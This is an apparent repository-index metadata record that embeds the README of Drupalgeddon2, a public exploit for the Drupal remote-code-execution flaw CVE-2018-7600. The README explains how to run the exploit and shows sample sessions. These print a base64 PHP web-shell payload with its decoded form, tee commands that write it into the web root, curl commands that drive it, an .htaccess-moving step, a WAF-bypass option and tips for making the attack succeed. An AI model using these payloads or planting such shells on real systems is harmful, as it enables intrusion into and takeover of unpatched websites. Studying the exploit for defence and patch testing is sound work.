{"id":13539254,"url":"https://github.com/dreadlocked/drupalgeddon2","last_synced_at":"2025-04-04T16:12:55.233Z","repository":{"id":41309050,"uuid":"129319611","full_name":"dreadlocked/Drupalgeddon2","owner":"dreadlocked","description":"Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)","archived":false,"fork":false,"pushed_at":"2021-01-08T10:31:22.000Z","size":103,"stargazers_count":587,"open_issues_count":7,"forks_count":173,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-04-04T16:12:50.372Z","etag":null,"topics":["cve-2018-7600","drupal","drupal7","drupal8","drupalgeddon","drupalgeddon2","exploit","poc","sa-core-2018-002"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dreadlocked.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-04-12T22:53:14.000Z","updated_at":"2025-02-02T02:04:34.000Z","dependencies_parsed_at":"2022-09-05T13:41:30.256Z","dependency_job_id":null,"html_url":"https://github.com/dreadlocked/Drupalgeddon2","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owne
rs/dreadlocked","download_url":"https://codeload.github.com/dreadlocked/Drupalgeddon2/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247208139,"owners_count":20901570,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2018-7600","drupal","drupal7","drupal8","drupalgeddon","drupalgeddon2","exploit","poc","sa-core-2018-002"],"created_at":"2024-08-01T09:01:22.473Z","updated_at":"2025-04-04T16:12:55.214Z","avatar_url":"https://github.com/dreadlocked.png","language":"Ruby","readme":"# CVE-2018-7600 | Drupal 8.5.x \u003c 8.5.1 / 8.4.x \u003c 8.4.6 / 8.x \u003c 8.3.9 / 7.x? \u003c 7.58 / \u003c 6.x? 
- 'Drupalgeddon2' RCE (SA-CORE-2018-002)\n\n[Drupalgeddon2 ~ https://github.com/dreadlocked/Drupalgeddon2/](https://github.com/dreadlocked/Drupalgeddon2/) _([https://www.drupal.org/sa-core-2018-002](https://www.drupal.org/sa-core-2018-002))_\n\nSupports:\n- Drupal **\u003c 8.3.9** / **\u003c 8.4.6** / **\u003c 8.5.1** ~ `user/register` URL, attacking the `account/mail` element \u0026 its `#post_render` parameter, using PHP's `passthru` function\n- Drupal **\u003c 7.58** ~ `user/password` URL, attacking the `_triggering_element_name` form parameter \u0026 the `#post_render` parameter, using PHP's `passthru` function\n- Works with **direct commands** (aka File-Less Method) or writes a **PHP shell** to the web root (`./`) or sub-directories (`./sites/default/` \u0026 `./sites/default/files/`)\n- Supports **Linux** \u0026 **Windows** targets\n- **Auto detects Drupal version** _(or takes a good guess!)_\n\nThe `user/register` method was chosen for Drupal v8.x, as it will return `HTTP 200` and render the output in the `data` JSON response _(un-comment the code for the `timezone`/`#lazy_builder` method, which will return `HTTP 500` \u0026 is blind!)_ _([More Information](https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708))_\n\nAuthors:\n- [Hans Topo](https://github.com/dreadlocked)  _([@\\_dreadlocked](https://twitter.com/_dreadlocked))_\n- [g0tmi1k](https://blog.g0tmi1k.com/) _([@g0tmi1k](https://twitter.com/g0tmi1k))_\n\nNotes:\n- For advanced users/setups there is a more customizable exploit. See the `drupalgeddon2-customizable-beta.rb` section\n- Before opening an issue, please read the troubleshooting section at the end. 
Thanks!\n\n\n- - -\n\n\n## Usage:\n\n```bash\n$ ruby drupalgeddon2.rb\nUsage: ruby drupalggedon2.rb \u003ctarget\u003e [--verbose] [--authentication]\n       ruby drupalgeddon2.rb https://example.com\n$\n```\nThe `--verbose` and `--authentication` parameters can be added in any order after \u003ctarget\u003e \nand they are both optional.\nIf `--authentication` is specified, you will be prompted to submit:\n* username, \n* password, \n* form field name for username, \n* form field name for password,\n* URL path to the web login page, e.g., `user/login`\n* any suffix to append after the credentials in the form submission, e.g., form_id, etc.\n\nThis is to support exploiting websites that first require a POST-based web login and that \nrespond with a session cookie upon successful authentication.\n\n\n### Drupal v8.x Example\n\n_Drupal v8.x \u003c v8.3.9 / v8.4.x \u003c v8.4.6 / v8.5.x \u003c v8.5.1_\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-8/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-8/\n--------------------------------------------------------------------------------\n[!] MISSING: http://localhost/drupal-8/CHANGELOG.txt    (HTTP Response: 404)\n[+] Found  : http://localhost/drupal-8/core/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal?: v8.x\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo TTTBJJBP\n[+] Result : TTTBJJBP\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! 
w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\n--------------------------------------------------------------------------------\n[i] Fake shell:   curl 'http://localhost/drupal-8/s.php' -d 'c=hostname'\nubuntu140045x64-drupal\u003e\u003e uname -a\nLinux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux\nubuntu140045x64-drupal\u003e\u003e\n```\n\n\n### Drupal v7.x Example\n\n_Drupal \u003c v7.58_\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-7/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-7/\n--------------------------------------------------------------------------------\n[+] Found  : http://localhost/drupal-7/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal!: v7.31\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo TKYPVVJJ\n[+] Result : TKYPVVJJ\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[+] Very Good News Everyone! Wrote to the web root! 
Waayheeeey!!!\n--------------------------------------------------------------------------------\n[i] Fake shell:   curl 'http://localhost/drupal-7/s.php' -d 'c=hostname'\n\nubuntu140045x64-drupal\u003e\u003e uptime\n 14:52:33 up 4 days,  3:35,  1 user,  load average: 0.00, 0.01, 0.05\nubuntu140045x64-drupal\u003e\u003e\n```\n\n\n#### Direct Commands / Non PHP Shell (aka File-Less Method)\n\nIf you do not want to even try to write a PHP web shell to the web server, edit the file as shown _(it will fall back to direct commands anyway if it can't find a writeable location)_:\n\n```ruby\ntry_phpshell = false\n```\n\n**Example**\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-nonwrite/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-nonwrite/\n--------------------------------------------------------------------------------\n[!] MISSING: http://localhost/drupal-nonwrite/CHANGELOG.txt    (HTTP Response: 404)\n[+] Found  : http://localhost/drupal-nonwrite/core/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal?: v8.x\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo HYCBAIET\n[+] Result : HYCBAIET\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [2] (HTTP Response: 404)...    
Might not have write access?\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Writing To Web Root (sites/default/)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [2] (HTTP Response: 404)...    Might not have write access?\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Writing To Web Root (sites/default/files/)\n[*] Moving : ./sites/default/files/.htaccess\n[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [1] (HTTP Response: 403)...    May not be able to execute PHP from here?\n[!] FAILED: Couldn't find writeable web path\n--------------------------------------------------------------------------------\n[*] Dropping back to direct commands\ndrupalgeddon2\u003e\u003e lsb_release -a\nDistributor ID:\tUbuntu\nDescription:\tUbuntu 14.04.5 LTS\nRelease:\t14.04\nCodename:\ttrusty\ndrupalgeddon2\u003e\u003e\n```\n\n\n#### Proxy Support\n\nFor proxy support _(e.g. Burp)_, edit the file, replacing the values with your own. Example:\n\n```ruby\nproxy_addr = \"192.168.0.130\"\nproxy_port = 8080\n```\n\n\n- - -\n\n\n#### Experimental but usable: drupalgeddon2-customizable-beta.rb\n\n`drupalgeddon2-customizable-beta.rb` is intended for more advanced users, as it is more customizable. 
It allows you to specify more parameters, such as the PHP method to use (not only `system()` or `passthru()`) and the way to reach the `user/password` form.\n\nUsage examples:\n\n```\nUsage example: ./drupalgeddon-customizable-beta.rb -u http://example.com/ -v 7 -c id\nMore info: -h\n    -u, --url URL                    [Required] Service URL\n    -v, --version VERSION            [Required] Target Drupal version {7,8}\n    -c, --command COMMAND            [Required] Command to execute\n    -m, --method PHP_METHOD          [Optional] PHP Method to use, by default: passthru\n        --form                       [Optional] Form to attack, by default '/user/password' in Drupal 7 and '/user/register' in Drupal 8\n        --cloudflare                 [Optional] Tries to bypass Cloudflare using Lua-Nginx +100 parameters WAF Bypass\n    -h, --help                       Prints this help\n```\n\n\n- - -\n\n\n## Troubleshooting:\n\n- If you get a _cannot load such file_ \"LoadError\" type of error, run `sudo gem install \u003cmissing dependency\u003e`.\nIn particular, you may need to install the _highline_ dependency with `sudo gem install highline`\n\n- The target may redirect to another path where Drupal exists (such as `HTTP 30x` responses)\n    - Solution: Make sure you are using the correct Drupal path\n\n- There are limits on which characters can be used in the payload/command\n    - Solution: This is due to how the characters are encoded in the URL request and how the vulnerable code then interprets them. Encode the payload and decode it on the target, e.g. with base64\n\n- If the target is Linux and isn't using \"GNU base64\", it may be the BSD version _(or it's not installed at all!)_\n    - Solution: Switch to `base64 -D` (rather than `base64 -d`) or use the file-less method\n\n- If the target is using Windows, writing the PHP shell always fails\n    - Solution: Use the file-less method. 
This is because the payload gets piped to a Unix program (`base64` / `tee`), rather than using `certutil` or `PowerShell`\n\n- Drupal v8.x - `./.htaccess` will stop any PHP scripts from executing in `./sites/default/` if that is the writeable folder\n    - Solution: Switch to the file-less method\n\n- Drupal v8.x - \"clean URL\" isn't enabled on the target\n    - Solution: N/A - Not vulnerable =(\n\n- Drupal v7.x - If the `/user/password` form is disabled, you need to find another form _(remember to change the exploit!)_\n    - Solution: The `form_id` parameter will change depending on the form used to exploit the vulnerability\n\n\n- - -\n\n\n## Links:\n\n- Drupal SA-CORE-2018-002 Advisory ~ https://www.drupal.org/sa-core-2018-002\n- CVE ~ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n- Write up \u0026 Research ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/\n- cURL commands/sample PoC ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708\n","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003eVulnerabilities\u0026\u0026Vulnerability Management\u0026\u0026Vulnerability Discovery/Hunting\u0026\u0026Exploit Development\u0026\u0026Exploitation\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"f799ff186643edfcf7ac1e94f08ba018\"\u003e\u003c/a\u003eWell-known Vulnerabilities\u0026\u0026CVE\u0026\u0026Specific Products"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2/lists"}